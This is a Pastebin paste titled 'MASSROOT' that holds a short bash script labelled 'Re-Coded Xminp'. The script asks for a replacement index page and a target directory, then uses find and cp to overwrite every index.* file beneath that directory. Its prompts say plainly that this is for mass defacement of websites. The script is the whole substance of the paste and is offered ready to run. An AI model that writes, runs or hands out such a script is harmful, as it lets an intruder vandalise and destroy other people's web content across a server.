Advertisement
Mikailxminp

MASSROOT

Aug 31st, 2018
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.26 KB | None | 0 0
  1. #!/bin/bash
  2. echo '### Re-Coded Xminp ###'
  3. echo '[+] your index path on the server'
  4. read index
  5. echo
  6. echo '[+] enter the path To deface '
  7. read path
  8. echo
  9. echo '[+] Starting ........'
  10. find $path -name "index.*" -exec cp $index {} \;
  11. echo
  12. echo '[+] Done !'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement